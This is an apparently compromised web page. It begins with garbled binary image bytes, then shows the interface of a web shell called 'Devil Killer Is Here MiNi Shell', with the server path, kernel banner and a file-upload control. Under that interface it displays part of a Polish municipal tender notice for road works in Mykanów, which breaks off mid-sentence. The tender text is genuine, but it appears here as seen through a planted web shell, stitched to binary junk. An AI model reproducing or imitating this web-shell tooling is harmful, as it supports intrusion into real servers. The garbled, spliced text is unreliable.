JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251022/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251022/0048931601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa drogi gminnej ulicy Leśnej w miejscowości Stary Broniszew oraz Remont dróg gminnych”- 3 części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mykanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398110</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Samorządowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mykanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mykanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mykanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa drogi gminnej ulicy Leśnej w miejscowości Stary Broniszew oraz Remont dróg gminnych”- 3 części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-81b8ca69-bd03-4f38-8e8b-99d3be3169fc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00489316</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00024350/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 „Przebudowa drogi gminnej ulicy Leśnej w miejscowości Stary Broniszew oraz Remont dróg gminnych”- 3 części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mykanow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mykanow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem https://platformazakupowa.pl/ pod adresem:<br/>https://platformazakupowa.pl/pn/mykanow/proceedings<br/>Zamawiający informuje, że instrukcje korzystania z https://platformazakupowa.pl/ dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu https://platformazakupowa.pl/ znajdują się w zakładce „Instrukcje<br/>dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>4)Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”.<br/>Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie<br/>elektronicznej za pośrednictwem https://platformazakupowa.pl/ do konkretnego wykonawcy.<br/>7) Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>https://platformazakupowa.pl/ ,tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 104, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na https://platformazakupowa.pl/ odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar. 11) Zamawiający wymaga, by formaty dokumentów sporządzanych przez Wykonawcę były zgodne z załącznikiem nr 2<br/>do rozporządzenia Rady Ministrów w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych i jednocześnie rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze<br/>szczególnym<br/>wskazaniem na .pdf<br/>12) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a) .zip<br/>b) .7Z<br/>13) Wśród formatów powszechnych a NIE występujących w rozporządzeniu<br/>występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>14) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp<br/>służącej do składania podpisu osobistego, który wynosi max 5MB. 15) Ze względu na niskie ryzyko naruszenia integralności pliku<br/>oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PadES.<br/>16) Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.19) Zaleca się, aby<br/>komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do zamawiającego”,<br/>nie za pośrednictwem adresu email</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">UE)2016/679 z dnia 27 kwietnia 2016 r. dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy w Mykanowie jest Wójt Gminy Mykanów z<br/>siedzibą: ul. Samorządowa 1, 42‑233 Mykanów;<br/>2) we wszystkich sprawach związanych z przetwarzaniem udostępnionych danych osobowych może się Pani/Pan kontaktować z<br/>Inspektorem Ochrony Danych Gminy Mykanów pod adresem e‑mail: iod@mykanow.pl lub na adres siedziby Urzędu Gminy w<br/>Mykanowie ul. Samorządowa 1 42- 233 Mykanów;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie przetargu nieograniczonego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (dalej ustawy Pzp) oraz podmioty<br/>uprawnione do ich przetwarzania na podstawie przepisów prawa;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy. Dane będą następnie przechowywane w celach archiwalnych, przez okres, który wyznaczony zostanie przede<br/>wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, chyba, że przepisy szczególne<br/>stanowią inaczej;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany i nie będą<br/>profilowane;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) Obowiązek informacyjny określony przepisami RODO spoczywa także na Wykonawcach, którzy pozyskują dane osobowe osób trzecich w celu przekazania ich Zamawiającemu w ofertach. Dla uzyskania przez Zamawiającego potwierdzenia, że osoby, których dane osobowe są przekazywane Zamawiającemu, dysponują już wskazanymi informacjami, jak również w celu właściwego zabezpieczenia i ochrony danych tych osób, z których Wykonawca będzie korzystał, przekazanych przez Wykonawcę w ofercie celem uzyskania przedmiotowego zamówienia publicznego wymagane jest oświadczenie Wykonawcy dotyczące pozyskania przez<br/>Wykonawcę danych osobowych od osób trzecich, które zawarte jest w formularzu oferty</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.17.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1- opis zadania:<br/> Przebudowę drogi gminnej ulicy Leśnej w miejscowości Stary Broniszew, Gmina Mykanów w granicach działek nr 18/1, 145<br/><br/>Lokalizacja inwestycji:<br/>Przedsięwzięcie znajduje się w gminie Mykanów w miejscowości Stary Broniszew i obejmuje przebudowę drogi gminnej, po śladzie istniejącej drogi tłuczniowej i w ramach istniejącego pasa drogowego na działkach Nr 145 i 18/1.<br/>Ze względu na to, że na odcinku poprzedzającym i następującym zrealizowano drogi o nawierzchni asfaltobetonowej szerokości 4,5m i 5,0m to i na opracowywanym odcinku projektuje się drogę o nawierzchni asfaltobetonowej szerokości 5,0 z obustronnymi poboczami szerokości 0,75 m.<br/><br/>Długość drogi ul. Leśnej to 388,90 m.<br/><br/>Podstawowe parametry budowanych elementów komunikacyjnych ul. Leśnej :<br/>Droga publiczna, ogólnodostępna z funkcją w sieci drogowej – gminna, <br/>o przyjętej klasie – droga lokalna „L” kategoria ruchu KR1.<br/>- przebudowa drogi szerokości 5,0 m<br/>- budowa pobocza utwardzonego kruszywem szer. 0,75 m<br/>- jednostronny spadek poprzeczny w kierunku południowym<br/>- powierzchniowe odprowadzenie wody na teren po stronie zachodniej, poprzez odpowiednie wyprofilowanie spadku poprzecznego jezdni<br/><br/>Konstrukcja nawierzchni<br/>Łączna rzeczywista grubość warstw zaprojektowanej konstrukcji wynosi:<br/>4+4+8+15+15= 46 cm dla nawierzchni z betonu asfaltowego.<br/><br/>Jezdnia drogi gminnej kat. ruchu KR 1 i na poszerzeniach<br/>- warstwa ścieralna- beton asfaltowy AC 11S o uziarnieniu 0/11 na bazie asfaltu D 50/70 4 cm<br/>- warstwa wiążąca- beton asfaltowy AC 16W o uziarnieniu 0/16mm na bazie asfaltu D 50/70 4 cm<br/>- podbudowa górna - kruszywo łamane 0/31,5mm stab. mechanicznie E2 =&gt;140 MPa, E2/E1&lt;=2,2 8 cm<br/>- podbudowa zasadnicza - kruszywo łamane 0/63mm stab. mech. E2=&gt;120 MPa E2/E1&lt;=2,2 15 cm<br/>- stabilizacja podłoża spoiwami hydraulicznymi Rm&gt; 2,5 MPa lub inna równoważna technologia pozwalająca doprowadzić podłoże do wymaganych parametrów nośności dla G1 15 cm<br/><br/>Pobocze<br/>- kruszywo łamane 0/31,5 mm stabilizowane mechanicznie 15 cm<br/><br/>Kolejność prowadzenia robót: <br/>· roboty pomiarowe,<br/>· roboty ziemne – korytowanie w gruncie kat. III,<br/>· wykonanie podbudowy z kruszywa łamanego,<br/>· wykonanie nawierzchni,<br/>· wykonanie poboczy<br/>· uformowanie skarpy za poboczem<br/>· prace porządkowe..<br/><br/>Faktyczna kolejność realizacji poszczególnych elementów robót, zostanie ustalona przez kierownika robót w porozumieniu z Inwestorem i zawarta w planie bezpieczeństwa i ochrony zdrowia.<br/><br/>„Wykonawca zobowiązany jest do wykonania stabilizacji granic pasa drogowego na odcinku objętym przebudową drogi”<br/><br/>Wykonawca zobowiązany jest po wykonaniu umowy sporządzić i przekazać Zamawiającemu Kosztorys Powykonawczy dla części 1; części 3 i dla części 2 – osobno dla każdej remontowanej drogi.<br/><br/>3. Wszystkie wielkości wynikające z konieczności wykonania niezbędnych prac budowlanych przestawiono jednocześnie w przedmiarach robót i dokumentacji technicznej w tym specyfikacji technicznej wykonania i odbioru robót – załącznik nr. 8 do SWZ/ dla wszystkich części/.<br/>4. Z uwagi na to, że wynagrodzenie wykonawcy wskazane w ofercie będzie miało charakter ryczałtowy, wykonawca przy wycenie oferty powinien opierać się na zakresie wskazanym w dokumentacji projektowej, o której mowa powyżej, dokumentacji technicznej i wszystkich pozostałych dokumentach stanowiących załącznik nr. 8 do SWZ / dla części 1 i 2i 3/ oraz wszelkich informacjach publikowanych przez Zamawiającego w toku postępowania, np. odpowiedzi na potencjalne pytania wykonawców. <br/>Przedmiar robót dla części 1 , części 2 i części 3 ma charakter pomocniczy. Wystąpienie w trakcie realizacji umowy robót nieujętych w przedmiarze lub robót w większej ilości w stosunku do przyjętej w przedmiarze nie będzie uprawniało wykonawcy do żądania dodatkowego wynagrodzenia - jeżeli roboty te ujęte były w dokumentacji projektowej i technicznej stanowiącej załącznik nr. 8 do SWZ.<br/>5. Po zakończeniu robót wykonawca zobowiązany jest do przywrócenia porządku i czystości na terenie objętym robotami oraz do wywiezienia wszelkich pozostałości budowlanych oraz odpadów zielonych z terenu inwestycji i ich utylizowania. <br/>6. Dokumenty stanowiące o niniejszym zamówieniu w tym projekt umowy należy traktować jako wzajemnie wyjaśniające się i równoważne. Wymagania określone w choćby jednym z dokumentów są obowiązujące dla Wykonawcy tak jakby zawarte były w całej dokumentacji. Jeżeli zostaną znalezione dwuznaczności lub rozbieżności między tymi dokumentami, to Zamawiający po uzyskaniu opinii Nadzoru Inwestorskiego udzieli w tym zakresie niezbędnych wyjaśnień lub wyda Wykonawcy niezbędne polecenia. Wykonawca nie może wykorzystywać tych dwuznaczności i rozbieżności przeciwko i na niekorzyść Zamawiającego.<br/><br/>Uwaga: <br/>Podstawą sporządzenia oferty jest dokumentacja, która jest załącznikiem nr 8 do niniejszej SWZ dla części 1 , części 2 i części 3.<br/><br/>7. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie materiałów równoważnych o parametrach technicznych nie gorszych niż określono w dokumentacji technicznej. <br/> <br/>8. Do zadań Wykonawcy należeć będzie również: urządzenie zaplecza placu budowy, przestrzegania przepisów Kodeksu Pracy, BHP, ochrony zdrowia i p.poż., zabezpieczenie placu budowy przed dostępem osób trzecich, odpowiednie oznakowanie prowadzonych robót. <br/>Zamawiający wymaga aby Wykonawca przed przystąpieniem do robót i w trakcie kontrolował i potwierdził rzeczywiste posadowienie w terenie istniejącej podziemnej infrastruktury technicznej (punktowe odkrywki). Wykopy w miejscach z uzbrojeniem podziemnym, należy wykonać ręcznie z zachowaniem szczególnej ostrożności w porozumieniu z przedstawicielami zarządców tych obiektów. Roboty z wykorzystaniem sprzętu zmechanizowanego wykonać należy z zachowaniem szczególnej ostrożności tak aby nie naruszać uzbrojenia naziemnego i podziemnego.<br/>Zamawiający nie dopuszcza możliwości roszczeń Wykonawcy z tytułu błędnego oszacowania ceny lub pominięcia kosztów i innych czynników mających lub mogących mieć wpływ na cenę.<br/>9.Na podstawie art.95 ust.1 Pzp Zamawiający wymaga zatrudnienia przez wykonawcę, podwykonawcę lub dalszego podwykonawcę dla każdej części tj. część 1, część 2, części 3 - osób wykonujących wszelkie czynności wchodzące w tzw. koszty bezpośrednie na podstawie umowy o pracę. Tak, więc wymóg ten dotyczy min. czynności: <br/>- roboty rozbiórkowe,<br/>- roboty ziemne,<br/>- roboty w zakresie wykonywania nawierzchni utwardzonej.<br/>- operatorów sprzętu<br/>- pracowników fizycznych.<br/>Wymóg zatrudnienia w stosunku pracy nie dotyczy osób pełniących samodzielne funkcje techniczne w budownictwie w rozumieniu ustawy Prawo budowlane, a także innych czynności polegających na sprawowaniu nadzoru nad wykonywanymi robotami.<br/>Sposób weryfikacji zatrudnienia tych osób, uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań związanych z zatrudnieniem tych osób oraz sankcji z tytułu niespełnienia tych wymagań zawarto we wzorze umowy paragraf 10<br/>– załącznik nr 7 do SWZ<br/><br/>10. Gwarancja dla wszystkich części tj. dla części 1, części 2, części 3<br/>Długość okresu gwarancji na roboty budowlane - stanowi kryterium oceny ofert. <br/>Okres rękojmi za wady będzie równy okresowi udzielonej gwarancji.<br/>Zamawiający określa go na okres w przedziale od 60 miesięcy (termin minimalny wymagany przez Zamawiającego) do 84 miesięcy (termin maksymalny). <br/>Uwaga:<br/>1)	Termin gwarancji stanowi kryterium oceny ofert.<br/>2)	Termin gwarancji należy zadeklarować w pełnych miesiącach od daty podpisania przez obie strony <br/>protokołu wykonania przedmiotu umowy.<br/>3)	Określenie terminu gwarancji w Formularzu Ofertowym poniżej wymaganego minimum <br/>tj. 60 miesięcy Zamawiający uzna iż Wykonawca zaoferował 60 miesięczny okres gwarancji<br/>4)	W przypadku deklaracji terminu gwarancji w Formularzu Ofertowym powyżej określonego maksimum, do porównania złożonych ofert przyjęte zostanie 84 miesięcy. <br/>5)	W przypadku gdy Wykonawca nie określi w Formularzu Ofertowym okresu gwarancji <br/>Zamawiający przyjmie gwarancję minimalną tj. 60 miesięcy.<br/>6)	Okres gwarancyjny nie zostanie uznany za zakończony, dopóki nie zostaną usunięte przez <br/>Wykonawcę wady i usterki zgłoszone do czasu upływu terminu gwarancyjnego oraz nie wygaśnie bieg gwarancji zgodnie z art.581 par.1 KC, a potwierdzeniem zakończenia będzie podpisany przez obie strony protokół odbioru pogwarancyjnego.	<br/>7)	Jeżeli Wykonawca nie usunie wad lub usterek w okresie gwarancji lub rękojmi w wyznaczonym przez Zamawiającego terminie Zamawiający po uprzednim zawiadomieniu Wykonawcy, może zlecić ich usunięcie osobie trzeciej na koszt Wykonawcy.<br/><br/>Okres gwarancyjny nie zostanie uznany za zakończony, dopóki nie zostaną usunięte przez Wykonawcę wady i usterki zgłoszone do czasu upływu terminu gwarancyjnego oraz nie wygaśnie bieg gwarancji zgodnie z art. 581 par.1 Kodeksu cywilnego, a potwierdzeniem zakończenia będzie podpisany przez obie strony protokół odbioru pogwarancyjnego. <br/>Umowa stanowi dokument gwarancyjny o jakim mowa w art. 577 § 1 kc. <br/>Zamawiającemu przysługują pełne uprawnienia z tytułu 